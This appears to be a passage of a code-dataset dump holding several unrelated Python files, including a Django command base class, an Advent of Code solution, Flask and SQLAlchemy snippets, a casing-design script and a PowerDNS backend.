user_confirm(self, msg, client):\n for tmp in self.server.online.copy():\n if tmp.uid == msg[2][\"uid\"]:\n tmp.send([\"cf.uc\", {\"uid\": client.uid, \"at\": msg[2][\"at\"]}])\n break\n\n def user_confirm_approve(self, msg, client):\n for tmp in self.server.online.copy():\n if tmp.uid == msg[2][\"uid\"]:\n tmp.send([\"cf.uca\", {\"uid\": client.uid, \"at\": msg[2][\"at\"]}])\n break\n\n def user_confirm_decline(self, msg, client):\n for tmp in self.server.online.copy():\n if tmp.uid == msg[2][\"uid\"]:\n tmp.send([\"cf.ucd\", {\"uid\": client.uid, \"at\": msg[2][\"at\"]}])\n break\n","sub_path":"modules/confirm.py","file_name":"confirm.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"457233649","text":"from django.conf import settings\nfrom django.db import connections\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.core.management.base import CommandError, CommandParser\nfrom django.utils.module_loading import import_string\n\nfrom db_mutex import DBMutexError, DBMutexTimeoutError\nfrom db_mutex.models import DBMutex\nfrom db_mutex.db_mutex import db_mutex\n\nfrom rest_framework.compat import coreapi, coreschema\nfrom rest_framework.schemas.coreapi import field_to_schema\n\nfrom settings import version\nfrom settings.roles import Roles\nfrom data.environment.models import Environment\nfrom data.user.models import User\nfrom systems.commands.index import CommandMixin\nfrom systems.commands.mixins import renderer\nfrom systems.commands import args, messages, help, options\nfrom systems.api.schema import command\nfrom utility.terminal import TerminalMixin\nfrom utility.runtime import Runtime\nfrom utility.text import wrap, wrap_page\nfrom utility.display import format_traceback\nfrom utility.parallel import Parallel\nfrom utility.data import deep_merge\n\nimport sys\nimport os\nimport time\nimport argparse\nimport re\nimport shutil\nimport threading\nimport queue\nimport string\nimport copy\nimport yaml\nimport json\nimport logging\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass BaseCommand(\n TerminalMixin,\n renderer.RendererMixin,\n CommandMixin('user'),\n CommandMixin('environment'),\n CommandMixin('group'),\n CommandMixin('config'),\n CommandMixin('module')\n):\n display_lock = threading.Lock()\n thread_lock = threading.Lock()\n\n\n def __init__(self, name, parent = None):\n self.facade_index = {}\n\n self.name = name\n self.parent_instance = parent\n self.exec_parent = None\n\n self.confirmation_message = 'Are you absolutely sure?'\n self.messages = queue.Queue()\n self.parent_messages = None\n self.mute = False\n\n self.schema = {}\n self.parser = None\n self.options = options.AppOptions(self)\n self.option_map = {}\n self.descriptions = help.CommandDescriptions()\n\n super().__init__()\n\n\n @property\n def manager(self):\n return settings.MANAGER\n\n\n def queue(self, msg):\n def _queue_parents(command, data):\n if command.parent_messages:\n command.parent_messages.put(data)\n if command.parent_instance:\n _queue_parents(command.parent_instance, data)\n\n data = msg.render()\n logger.debug(\"Adding command queue message: {}\".format(data))\n\n self.messages.put(data)\n _queue_parents(self, data)\n return data\n\n def flush(self):\n logger.debug(\"Flushing command queue\")\n self.messages.put(None)\n\n def create_message(self, data, decrypt = True):\n return messages.AppMessage.get(data, decrypt = decrypt)\n\n def get_messages(self, flush = True):\n messages = []\n\n if flush:\n self.flush()\n\n for message in iter(self.messages.get, None):\n messages.append(message)\n return messages\n\n\n def add_schema_field(self, name, field, optional = True):\n self.schema[name] = coreapi.Field(\n name = name,\n location = 'form',\n required = not optional,\n schema = field_to_schema(field),\n type = type(field).__name__.lower()\n )\n\n def get_schema(self):\n return command.CommandSchema(list(self.schema.values()), re.sub(r'\\s+', ' ', self.get_description(False)))\n\n\n def create_parser(self):\n\n def display_error(message):\n self.warning(message + \"\\n\")\n self.print_help()\n self.exit(1)\n\n epilog = self.get_epilog()\n if epilog:\n epilog = \"\\n\".join(wrap_page(epilog))\n\n parser = CommandParser(\n prog = self.command_color('{} {}'.format(settings.APP_NAME, self.get_full_name())),\n description = \"\\n\".join(wrap_page(\n self.get_description(False),\n init_indent = ' ',\n init_style = self.header_color(),\n indent = ' '\n )),\n epilog = epilog,\n formatter_class = argparse.RawTextHelpFormatter,\n called_from_command_line = True\n )\n parser.error = display_error\n\n self.add_arguments(parser)\n return parser\n\n def add_arguments(self, parser):\n self.parser = parser\n self.parse_base()\n\n\n def parse(self):\n # Override in subclass\n pass\n\n def parse_base(self):\n self.option_map = {}\n\n if not self.parse_passthrough():\n self.parse_verbosity()\n self.parse_no_parallel()\n self.parse_no_color()\n self.parse_debug()\n self.parse_display_width()\n\n if not settings.API_EXEC:\n self.parse_environment_host()\n self.parse_version()\n\n self.parse()\n\n def parse_passthrough(self):\n return False\n\n\n def parse_environment_host(self):\n self.parse_variable('environment_host',\n '--host', str,\n \"environment host name (default: {})\".format(settings.DEFAULT_HOST_NAME),\n value_label = 'NAME',\n default = settings.DEFAULT_HOST_NAME\n )\n\n @property\n def environment_host(self):\n return self.options.get('environment_host', settings.DEFAULT_HOST_NAME)\n\n\n def parse_verbosity(self):\n self.parse_variable('verbosity',\n '--verbosity', int,\n \"\\n\".join(wrap(\"verbosity level; 0=no output, 1=minimal output, 2=normal output, 3=verbose output\", 60)),\n value_label = 'LEVEL',\n default = 2,\n choices = (0, 1, 2, 3)\n )\n\n @property\n def verbosity(self):\n return self.options.get('verbosity', 2)\n\n\n def parse_version(self):\n self.parse_flag('version', '--version', \"show environment runtime version information\")\n\n def parse_display_width(self):\n columns, rows = shutil.get_terminal_size(fallback = (settings.DISPLAY_WIDTH, 25))\n self.parse_variable('display_width',\n '--display-width', int,\n \"CLI display width (default {} characters)\".format(columns),\n value_label = 'WIDTH',\n default = columns\n )\n\n @property\n def display_width(self):\n return self.options.get('display_width', Runtime.width())\n\n def parse_no_color(self):\n self.parse_flag('no_color', '--no-color', \"don't colorize the command output\")\n\n @property\n def no_color(self):\n return self.options.get('no_color', not Runtime.color())\n\n def parse_debug(self):\n self.parse_flag('debug', '--debug', 'run in debug mode with error tracebacks')\n\n @property\n def debug(self):\n return self.options.get('debug', Runtime.debug())\n\n def parse_no_parallel(self):\n self.parse_flag('no_parallel', '--no-parallel', 'disable parallel processing')\n\n @property\n def no_parallel(self):\n return self.options.get('no_parallel', not Runtime.parallel())\n\n\n def interpolate_options(self):\n return True\n\n\n def server_enabled(self):\n return True\n\n def remote_exec(self):\n return self.server_enabled()\n\n def groups_allowed(self):\n return False\n\n\n def get_version(self):\n return version.VERSION\n\n def get_priority(self):\n return 1\n\n\n def get_parent_name(self):\n if self.parent_instance and self.parent_instance.name != 'root':\n return self.parent_instance.get_full_name()\n return ''\n\n def get_full_name(self):\n return \"{} {}\".format(self.get_parent_name(), self.name).strip()\n\n def get_description(self, overview = False):\n return self.descriptions.get(self.get_full_name(), overview)\n\n def get_epilog(self):\n return None\n\n\n @property\n def active_user(self):\n return self._user.active_user\n\n def check_access(self, instance, reset = False):\n return self.check_access_by_groups(instance, instance.access_groups(reset))\n\n def check_access_by_groups(self, instance, groups):\n user_groups = [ Roles.admin ]\n\n if not groups or self.active_user.name == settings.ADMIN_USER:\n return True\n\n for group in groups:\n if isinstance(group, (list, tuple)):\n user_groups.extend(list(group))\n else:\n user_groups.append(group)\n\n if len(user_groups):\n if not self.active_user.env_groups.filter(name__in = user_groups).exists():\n self.warning(\"Operation {} {} {} access requires at least one of the following roles in environment: {}\".format(\n self.get_full_name(),\n instance.facade.name,\n instance.name,\n \", \".join(user_groups)\n ))\n return False\n\n return True\n\n\n def get_provider(self, type, name, *args, **options):\n type_components = type.split(':')\n type = type_components[0]\n subtype = type_components[1] if len(type_components) > 1 else None\n\n base_provider = self.manager.index.get_plugin_base(type)\n providers = self.manager.index.get_plugin_providers(type, True)\n\n if name is None or name in ('help', 'base'):\n provider_class = base_provider\n elif name in providers.keys():\n provider_class = providers[name]\n else:\n self.error(\"Plugin {} provider {} not supported\".format(type, name))\n\n try:\n return provider_class(type, name, self, *args, **options).context(subtype, self.test)\n except Exception as e:\n self.error(\"Plugin {} provider {} error: {}\".format(type, name, e))\n\n\n def print_help(self):\n parser = self.create_parser()\n self.info(parser.format_help())\n\n\n def info(self, message, name = None, prefix = None):\n with self.display_lock:\n if not self.mute:\n msg = messages.InfoMessage(str(message),\n name = name,\n prefix = prefix,\n silent = False\n )\n self.queue(msg)\n\n if not settings.API_EXEC and self.verbosity > 0:\n msg.display(\n debug = self.debug,\n disable_color = self.no_color,\n width = self.display_width\n )\n\n def data(self, label, value, name = None, prefix = None, silent = False):\n with self.display_lock:\n if not self.mute:\n msg = messages.DataMessage(str(label), value,\n name = name,\n prefix = prefix,\n silent = silent\n )\n self.queue(msg)\n\n if not settings.API_EXEC and self.verbosity > 0:\n msg.display(\n debug = self.debug,\n disable_color = self.no_color,\n width = self.display_width\n )\n\n def silent_data(self, name, value):\n self.data(name, value,\n name = name,\n silent = True\n )\n\n def notice(self, message, name = None, prefix = None):\n with self.display_lock:\n if not self.mute:\n msg = messages.NoticeMessage(str(message),\n name = name,\n prefix = prefix,\n silent = False\n )\n self.queue(msg)\n\n if not settings.API_EXEC and self.verbosity > 0:\n msg.display(\n debug = self.debug,\n disable_color = self.no_color,\n width = self.display_width\n )\n\n def success(self, message, name = None, prefix = None):\n with self.display_lock:\n if not self.mute:\n msg = messages.SuccessMessage(str(message),\n name = name,\n prefix = prefix,\n silent = False\n )\n self.queue(msg)\n\n if not settings.API_EXEC and self.verbosity > 0:\n msg.display(\n debug = self.debug,\n disable_color = self.no_color,\n width = self.display_width\n )\n\n def warning(self, message, name = None, prefix = None):\n with self.display_lock:\n msg = messages.WarningMessage(str(message),\n name = name,\n prefix = prefix,\n silent = False\n )\n self.queue(msg)\n\n if not settings.API_EXEC and self.verbosity > 0:\n msg.display(\n debug = self.debug,\n disable_color = self.no_color,\n width = self.display_width\n )\n\n def error(self, message, name = None, prefix = None, terminate = True, traceback = None, error_cls = CommandError, silent = False):\n with self.display_lock:\n msg = messages.ErrorMessage(str(message),\n traceback = traceback,\n name = name,\n prefix = prefix,\n silent = silent\n )\n if not traceback:\n msg.traceback = format_traceback()\n\n self.queue(msg)\n\n if not settings.API_EXEC and not silent:\n msg.display(\n debug = self.debug,\n disable_color = self.no_color,\n width = self.display_width\n )\n\n if terminate:\n raise error_cls('')\n\n def table(self, data, name = None, prefix = None, silent = False, row_labels = False):\n with self.display_lock:\n if not self.mute:\n msg = messages.TableMessage(data,\n name = name,\n prefix = prefix,\n silent = silent,\n row_labels = row_labels\n )\n self.queue(msg)\n\n if not settings.API_EXEC and self.verbosity > 0:\n msg.display(\n debug = self.debug,\n disable_color = self.no_color,\n width = self.display_width\n )\n\n def silent_table(self, name, data):\n self.table(data,\n name = name,\n silent = True\n )\n\n def confirmation(self, message = None):\n if not settings.API_EXEC and not self.force:\n if not message:\n message = self.confirmation_message\n\n confirmation = input(\"{} (type YES to confirm): \".format(message))\n\n if re.match(r'^[Yy][Ee][Ss]$', confirmation):\n return True\n\n self.error(\"User aborted\", 'abort')\n\n\n def format_fields(self, data, process_func = None):\n fields = self.get_schema().get_fields()\n params = {}\n\n for key, value in data.items():\n if process_func and callable(process_func):\n key, value = process_func(key, value)\n\n if value is not None and value != '':\n if key in fields:\n type = fields[key].type\n\n if type in ('dictfield', 'listfield'):\n params[key] = json.loads(value)\n elif type == 'booleanfield':\n params[key] = json.loads(value.lower())\n elif type == 'integerfield':\n params[key] = int(value)\n elif type == 'floatfield':\n params[key] = float(value)\n\n if key not in params:\n params[key] = value\n else:\n params[key] = None\n\n return params\n\n\n def run_list(self, items, callback):\n results = Parallel.list(items, callback, disable_parallel = self.no_parallel)\n\n if results.aborted:\n for thread in results.errors:\n self.error(thread.error, prefix = \"[ {} ]\".format(thread.name), traceback = thread.traceback, terminate = False)\n\n self.error(\"Parallel run failed\", silent = True)\n\n return results\n\n def run_exclusive(self, lock_id, callback, error_on_locked = False, wait = True, timeout = 600, interval = 2):\n if not lock_id:\n callback()\n else:\n start_time = time.time()\n current_time = start_time\n\n while (current_time - start_time) <= timeout:\n try:\n with db_mutex(lock_id):\n callback()\n break\n\n except DBMutexError:\n if error_on_locked:\n self.error(\"Could not obtain lock for {}\".format(lock_id))\n if not wait:\n break\n\n except DBMutexTimeoutError:\n logger.warning(\"Task {} completed but the lock timed out\".format(lock_id))\n break\n\n except Exception as e:\n DBMutex.objects.filter(lock_id = lock_id).delete()\n raise e\n\n time.sleep(interval)\n current_time = time.time()\n\n\n def ensure_resources(self):\n for facade_index_name in sorted(self.facade_index.keys()):\n if facade_index_name not in ['00_environment', '00_user']:\n self.facade_index[facade_index_name]._ensure(self)\n\n def set_options(self, options):\n self.options.clear()\n\n host = options.pop('environment_host', None)\n if host:\n self.options.add('environment_host', host, False)\n\n for key, value in options.items():\n self.options.add(key, value)\n\n\n def bootstrap_ensure(self):\n return True\n\n def bootstrap(self, options, primary = False):\n if primary:\n if options.get('debug', False):\n Runtime.debug(True)\n\n if options.get('no_parallel', False):\n Runtime.parallel(False)\n\n if options.get('no_color', False):\n Runtime.color(False)\n\n if options.get('display_width', False):\n Runtime.width(options.get('display_width'))\n\n self._environment._ensure(self)\n self._user._ensure(self)\n\n self.set_options(options)\n if primary and self.bootstrap_ensure():\n self.ensure_resources()\n\n def handle(self, options):\n # Override in subclass\n pass\n\n\n def run_from_argv(self, argv):\n parser = self.create_parser()\n args = argv[(len(self.get_full_name().split(' ')) + 1):]\n\n if not self.parse_passthrough():\n if '--version' in argv:\n return self.manager.index.find_command(\n 'version',\n main = True\n ).run_from_argv([])\n\n elif '-h' in argv or '--help' in argv:\n return self.print_help()\n\n options = vars(parser.parse_args(args))\n else:\n options = { 'args': args }\n\n try:\n self.bootstrap(options, True)\n self.handle(options, True)\n finally:\n try:\n connections.close_all()\n except ImproperlyConfigured:\n pass\n","sub_path":"app/systems/commands/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":19544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"246863201","text":"import sys\nimport time\n\n\ndatas = [val for val in sys.stdin]\n\ndef parse(datas):\n res = []\n for data in datas:\n date = data[1:].split(\"]\")[0]\n conv = time.strptime(date,\"%Y-%m-%d %H:%M\")\n date = time.strftime(\"%Y-%m-%d %H:%M\", conv)\n if int(time.strftime(\"%H\", conv)) == 23:\n _time = \"00:00\"\n else:\n _time = time.strftime(\"%H:%M\", conv)\n if \"#\" in data:\n state = \"#\" + data.split(\"#\")[1].split(\" \")[0]\n else:\n if \"wakes up\" in data.split(\"] \")[1]:\n state = 1\n else:\n state = 0\n res.append([date, state, _time])\n return (res)\n\ndatas = parse(datas)\ndatas = sorted(datas, key=lambda datas: datas[0])\n\nfor data in datas:\n print(data)\n\nturns = []\ncur_tab = [\"1\"] * 60\nold_id = datas[0][1]\ndatas.pop(0)\nfor i, data in enumerate(datas):\n if isinstance(data[1], str) and \"#\" in data[1]:\n new_id = data[1]\n turns.append({old_id: cur_tab})\n cur_tab = [\"1\"] * 60\n old_id = new_id\n if data[1] == 1 and datas[i - 1][1] == 0:\n start = time.strptime(datas[i - 1][2],\"%H:%M\")\n end = time.strptime(data[2],\"%H:%M\")\n chunk = int(time.strftime(\"%M\", end)) - int(time.strftime(\"%M\", start))\n cur_tab[int(time.strftime(\"%M\", start)) : int(time.strftime(\"%M\", end))] = [\"0\"] * chunk\n if i == len(datas) - 1:\n turns.append({old_id: cur_tab})\n\nprint(\"\\nID Minute\\\n \\n 000000000011111111112222222222333333333344444444445555555555\\\n \\n 012345678901234567890123456789012345678901234567890123456789\\n\")\n\n\nfor turn in turns:\n for key, val in turn.items():\n print(key, ''.join(val))\n\nguards_s = {}\nfor turn in turns:\n for key, val in turn.items():\n if key not in guards_s:\n guards_s[key] = 60 - sum([int(i) for i in val])\n else:\n guards_s[key] += 60 - sum([int(i) for i in val])\n\nprint(\"\\n\", guards_s)\n\ndef keywithmaxval(d):\n \"\"\" a) create a list of the dict's keys and values; \n b) return the key with the max value\"\"\" \n v=list(d.values())\n k=list(d.keys())\n return k[v.index(max(v))]\n\nsleepy_guard = keywithmaxval(guards_s)\nprint(\"\\n\", sleepy_guard)\n\nguards_sleep = [0] * 60\nfor turn in turns:\n for key, val in turn.items():\n if key == sleepy_guard:\n for i, elem in enumerate(guards_sleep):\n guards_sleep[i] += 0 if val[i] == \"1\" else 1\n\nsleepy_minute = guards_sleep.index(max(guards_sleep))\nprint(\"\\n\", sleepy_minute)\nsleepy_guard = int(keywithmaxval(guards_s)[1:])\nprint(\"\\n\", sleepy_minute * sleepy_guard)\n","sub_path":"2018/D4/puzzle1.py","file_name":"puzzle1.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"104013390","text":"from .db import db\nfrom .usersOnTeam import UsersOnTeams\n\n\nclass Team(db.Model):\n __tablename__ = \"teams\"\n\n id = db.Column(db.Integer, nullable = False, primary_key = True)\n teamName = db.Column(db.String(50), nullable = False)\n \n users = db.relationship(\"User\", secondary=UsersOnTeams, back_populates=\"teams\")\n projects = db.relationship(\"Project\", back_populates=\"team\")\n\n def to_dict(self):\n return {\n \"id\": self.id,\n \"teamName\": self.teamName,\n }","sub_path":"app/models/team.py","file_name":"team.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"380800648","text":"'''\r\nCreated on May 28, 2013\r\nmodule exports the TestPerson class\r\n@author: Vanessa\r\n'''\r\n\r\nfrom personmodule import Person\r\nimport unittest\r\n\r\nclass TestPerson(unittest.TestCase):\r\n \"\"\"\r\n test class that will contain functions which test each of the functions in the Person class to make \r\n sure they work as they should\r\n \"\"\" \r\n \r\n def setUp(self):\r\n personV = Person()\r\n \r\n def test_set_get_age(self):\r\n \"\"\"\r\n tests the set_age() and get_age() functions\r\n accepts age1 and sets the user's age\r\n returns True if the function returns the user's correct age\r\n \"\"\"\r\n personV = Person()\r\n personV.set_age(18)\r\n self.assertEqual(personV.get_age(), 18)\r\n \r\n def test_set_get_name(self):\r\n \"\"\"\r\n tests the set_name() and get_name() functions\r\n accepts name1 and sets the user's name\r\n returns True if the function returns the user's correct name\r\n \"\"\"\r\n personV = Person()\r\n personV.set_name(\"Vanessa\")\r\n self.assertEqual(personV.get_name(), \"Vanessa\")\r\n\r\nif __name__ == \"__main__\":\r\n unittest.main() ","sub_path":"SocialNetworkPython2/testperson.py","file_name":"testperson.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"633659336","text":"from flask import g, abort\n\nfrom .utils import json_response\nfrom ._03_post_method import app\n\n\n@app.route('/book/', methods=['DELETE'])\ndef book_delete(book_id):\n params = {'id': book_id}\n query = 'SELECT count(*) FROM book WHERE book.id = :id'\n cursor = g.db.execute(query, params)\n\n # Check if book exists\n if cursor.fetchone()[0] == 0:\n # Doesn't exist. Return 404.\n abort(404)\n\n # Delete it\n delete_query = 'DELETE FROM book WHERE book.id = :id'\n g.db.execute(delete_query, {'id': book_id})\n g.db.commit()\n\n return json_response(status=204)\n\n\n@app.errorhandler(404)\ndef not_found(e):\n return '', 404\n","sub_path":"python/api/_04_delete_method.py","file_name":"_04_delete_method.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"260773525","text":"class Solution:\r\n def rotateRight(self, head: ListNode, k: int) -> ListNode:\r\n if head == None or head.next == None:\r\n return head\r\n count = 1\r\n p = head\r\n while p.next:\r\n count+=1\r\n p=p.next\r\n rot = k%count\r\n temp = head\r\n p.next = head\r\n for i in range(count-rot-1):\r\n temp = temp.next\r\n answer = temp.next\r\n temp.next = None\r\n return answer\r\n","sub_path":"LeetCode/Python/1-100/61.py","file_name":"61.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"190071801","text":"from contasdoape.models.Despesa import Despesa \nfrom datetime import datetime\nfrom itertools import groupby\n\nclass MesFiscal():\n def __init__(self, ape, data_inicio, data_fim):\n params = {'data_inicio' : data_inicio, \n 'data_fim' : data_fim, \n 'ape' : ape}\n\n for key, value in params.items():\n if not value: raise ValueError(key)\n\n self.data_inicio = data_inicio\n self.data_fim = data_fim\n self.ape = ape\n\n def listar_despesas(self):\n return [despesa for despesa in self.ape.despesas\n if despesa.data >= self.data_inicio and \n despesa.data <= self.data_fim]\n\n def calcular_saldo(self):\n despesas = self.listar_despesas()\n return sum(d.valor for d in despesas)\n\n def nome_do_mes(self):\n meses = {1 : 'Janeiro', 2 : 'Fevereiro', 3 : 'Março', 4 : 'Abril', \n 5 : 'Maio', 6 : 'Junho', 7 : 'Julho', 8 : 'Agosto', \n 9 : 'Setembro', 10 : 'Outubro', 11 : 'Novembro', 12 : 'Dezembro' }\n \n return meses[self.data_inicio.month]\n\n def obter_despesas(self, autor=None):\n despesas_por_autor = groupby(self.listar_despesas(), lambda d : d.autor)\n\n if autor:\n return next(list(despesas) for usuario, despesas in despesas_por_autor\n if usuario.id == autor.id )\n\n return { autor : list(despesas) for autor, despesas in despesas_por_autor }\n\n def obter_sumario(self):\n autores = self.gastos_por_pessoa()\n\n sumario = { 'nome' : self.nome_do_mes(),\n 'total' : self.calcular_saldo() }\n\n sumario.update(autores)\n\n return sumario\n","sub_path":"contasdoape/models/MesFiscal.py","file_name":"MesFiscal.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"185426334","text":"from optimization.optGrammar import optimize\nfrom optimization.abstract.optimize import OptimizedInstruction\n\nlistaOpt = list()\n\ndef optimizeCode(entradaOpt:str):\n listaOpt = optimize(entradaOpt)\n\n generator = OptimizedGenerator()\n #Intentamos optimizar cada instruccion\n for ins in listaOpt:\n if isinstance(ins, OptimizedInstruction):\n ins.optimize(generator)\n\n #Agregamos al nuevo doc\n for ins in listaOpt:\n if isinstance(ins, OptimizedInstruction):\n ins.addToCode(generator)\n elif isinstance(ins, str):\n generator.addToCode(ins)\n\n generator.makeCode()\n generator.makeReport()\n\nclass OptimizedGenerator:\n \"\"\"\n Clase encargada de generar codigo optimizado\n \"\"\"\n def __init__(self) -> None:\n self.report = list()\n self.code = list()\n\n def addToCode(self, text):\n self.code.append(text+'\\n')\n\n def toReport(self, text):\n self.report.append(text +'\\n')\n\n def genCode(self) -> str:\n string = ''\n string+=\"from goto import with_goto\\n\"\n string+=\"from interpreter import execution\\n\"\n string+=\"from c3d.stack import Stack\\n\"\n for line in self.code:\n string += line\n\n return string\n\n def genReport(self) -> str:\n report = '''\n\n \n \n Reporte de Optimización\n \n\n\n\n
\n

Reporte de Optimización

\n \n \n \n \n '''\n for line in self.report:\n report += line\n report += '''\n
Instrucción OptimizadaReglaLinea
\n
\n\n'''\n return report\n\n def makeCode(self):\n code = self.genCode()\n with open('codigoOptimizado.py','w') as file:\n file.write(code)\n file.close()\n\n def makeReport(self):\n report = self.genReport()\n with open('reporteOptimizado.html','w') as file:\n file.write(report)\n file.close()\n","sub_path":"parser/fase2/team25/optimization/genOptimized.py","file_name":"genOptimized.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"644101408","text":"import json\n\n# get json file from score web interface\nfrom scorelib.converter import Converter\nfrom scorelib.design.casing_design import CasingDesign\nfrom scorelib.design.standards.n_2752_y_2014_design_standard import N2752Y2014SimpleConnectionTriaxialDesignStandard\nfrom scorelib.loads.backup_pressure.cementing_backup import CementingBackupAttributes, CementingBackup\nfrom scorelib.loads.collapse_loads.cementing_load import CementingAttributes, Cementing\nfrom scorelib.loads.scenarios.load_scenario import LoadScenario\n\nfrom parsers.score_project_json import JSONTest, convert_json\n\nwith open(\"C:/casing_selection-master/scripts/score_projects/project476.json\", 'r', encoding=\"latin-1\") as f:\n data = json.load(f)\n\ninstance = JSONTest()\ninstance.input = convert_json(data)\n\nproject = Converter.to_lccv_project(instance)\n\n# definir fase a ser analisada\ncasing_string = project.casing_strings[2]\n\n# definir e calcular carregamentos\nattributes = CementingAttributes(displacement_fluid=casing_string.displacement_fluid,\n surface_pressure_during_setting=casing_string.surface_pressure_during_setting)\ninternal_pressure_load = Cementing(project=project,\n casing_string=casing_string,\n attributes=attributes)\nbackup_attributes = CementingBackupAttributes(slurry_density=casing_string.slurry_density,\n mud_weight=casing_string.mud_weight,\n toc_md=casing_string.toc_md,\n second_slurry_density=casing_string.second_slurry_density,\n second_slurry_length=casing_string.second_slurry_length)\nbackup = CementingBackup(project=project,\n casing_string=casing_string,\n attributes=backup_attributes)\n\nresult = LoadScenario(internal_pressure_load=internal_pressure_load,\n external_pressure_load=backup\n ).solve()\n\ncasing_design = CasingDesign(string_sections=casing_string.string_sections,\n load_result=result,\n design_standard=N2752Y2014SimpleConnectionTriaxialDesignStandard)\n\nprint(casing_design.load_result.internal_profile)\nprint(casing_design.api_collapse_strength)\nprint(casing_design.load_result.external_profile)\nprint(casing_design.load_result.axial_profile)\n\nprint(casing_design.get_api_burst_safety_factor())\nprint(casing_design.get_api_collapse_safety_factor())\nprint(casing_design.get_api_axial_safety_factor())\nprint(casing_design.get_api_von_mises_safety_factor())\n\nprint(casing_design.get_api_barlow_failure_probability_profile())\nprint(casing_design.get_api_collapse_failure_probability_profile())\nprint(casing_design.get_api_axial_failure_probability_profile())\nprint(casing_design.get_von_mises_failure_probability_profile())\n","sub_path":"source/tutorial_json.py","file_name":"tutorial_json.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"315584750","text":"# Copyright 2012 Hewlett-Packard Development Company, L.P. All Rights Reserved.\n# Copyright 2012 Managed I.T.\n#\n# Author: Patrick Galbraith \n# Author: Kiall Mac Innes \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\nfrom sqlalchemy import Column, String, Text, Integer\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import exc as sqlalchemy_exceptions\nfrom moniker.openstack.common import cfg\nfrom moniker.openstack.common import log as logging\nfrom moniker import exceptions\nfrom moniker.backend import base\nfrom moniker.central import api as central_api\nfrom moniker.context import MonikerContext\nfrom moniker.sqlalchemy.session import get_session, SQLOPTS\nfrom moniker.sqlalchemy.models import Base as CommonBase\nfrom moniker.sqlalchemy.types import UUID\n\nLOG = logging.getLogger(__name__)\n\ncfg.CONF.register_group(cfg.OptGroup(\n name='backend:powerdns', title=\"Configuration for Powerdns Backend\"\n))\n\ncfg.CONF.register_opts(SQLOPTS, group='backend:powerdns')\n\n\nclass Base(CommonBase):\n id = Column(Integer, primary_key=True, autoincrement=True)\n\n\nBase = declarative_base(cls=Base)\n\n\nclass Domain(Base):\n __tablename__ = 'domains'\n\n moniker_id = Column(UUID, nullable=False)\n\n name = Column(String(255), nullable=False, unique=True)\n master = Column(String(128), nullable=True)\n last_check = Column(Integer, default=None, nullable=True)\n type = Column(String(6), nullable=False)\n notified_serial = Column(Integer, default=None, nullable=True)\n account = Column(String(40), default=None, nullable=True)\n\n\nclass Record(Base):\n __tablename__ = 'records'\n\n moniker_id = Column(UUID, nullable=False)\n\n domain_id = Column(Integer, default=None, nullable=True)\n name = Column(String(255), default=None, nullable=True)\n type = Column(String(10), default=None, nullable=True)\n content = Column(Text, default=None, nullable=True)\n ttl = Column(Integer, default=None, nullable=True)\n prio = Column(Integer, default=None, nullable=True)\n change_date = Column(Integer, default=None, nullable=True)\n\n\nclass PowerDNSBackend(base.Backend):\n __plugin_name__ = 'powerdns'\n\n def start(self):\n super(PowerDNSBackend, self).start()\n\n self.session = get_session(self.name)\n\n def create_domain(self, context, domain):\n admin_context = MonikerContext.get_admin_context()\n\n servers = central_api.get_servers(admin_context)\n\n domain_m = Domain()\n domain_m.update({\n 'moniker_id': domain['id'],\n 'name': domain['name'].rstrip('.'),\n 'master': servers[0]['name'].rstrip('.'),\n 'type': 'NATIVE',\n 'account': context.tenant_id\n })\n domain_m.save(self.session)\n\n for server in servers:\n record_m = Record()\n record_m.update({\n 'moniker_id': server['id'],\n 'domain_id': domain_m.id,\n 'name': domain['name'].rstrip('.'),\n 'type': 'NS',\n 'content': server['name'].rstrip('.')\n })\n record_m.save(self.session)\n\n # NOTE(kiall): Do the SOA last, ensuring we don't trigger a NOTIFY\n # before the NS records are in place.\n record_m = Record()\n record_m.update({\n 'moniker_id': domain['id'],\n 'domain_id': domain_m.id,\n 'name': domain['name'].rstrip('.'),\n 'type': 'SOA',\n 'content': self._build_soa_content(domain)\n })\n record_m.save(self.session)\n\n def update_domain(self, context, domain):\n domain_m = self._get_domain(domain['id'])\n\n soa_record_m = self._get_record(domain=domain_m, type='SOA')\n\n soa_record_m.update({\n 'content': self._build_soa_content(domain)\n })\n\n soa_record_m.save(self.session)\n\n def delete_domain(self, context, domain):\n domain_m = self._get_domain(domain['id'])\n domain_m.delete(self.session)\n\n self.session.query(Record).filter_by(domain_id=domain_m.id).delete()\n\n def create_record(self, context, domain, record):\n domain_m = self._get_domain(domain['id'])\n record_m = Record()\n\n record_m.update({\n 'moniker_id': record['id'],\n 'domain_id': domain_m.id,\n 'name': record['name'].rstrip('.'),\n 'type': 